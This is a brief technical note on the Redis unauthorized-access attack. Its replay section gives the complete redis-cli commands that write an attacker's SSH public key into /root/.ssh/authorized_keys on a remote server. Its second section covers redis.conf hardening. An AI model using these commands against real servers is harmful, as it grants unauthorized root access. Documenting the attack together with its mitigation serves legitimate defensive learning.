Redis Hack

Remote login

How to replay

ssh-keygen –t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo
$ cat foo | redis-cli -h $remote_ip -x set crack
$ redis-cli -h $remote_ip
# in redis CLI
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
# save /root/.ssh/authorized_keys
save

How to avoid

# redis.conf
# disable to change dbfilename via remote connetion
rename-command FLUSHALL ""
rename-command CONFIG   ""
rename-command EVAL     ""
requirepass mypassword
bind 127.0.0.1

groupadd -r redis && useradd -r -g redis redis
最后修改 2023-03-11: split into more parts (54b443e)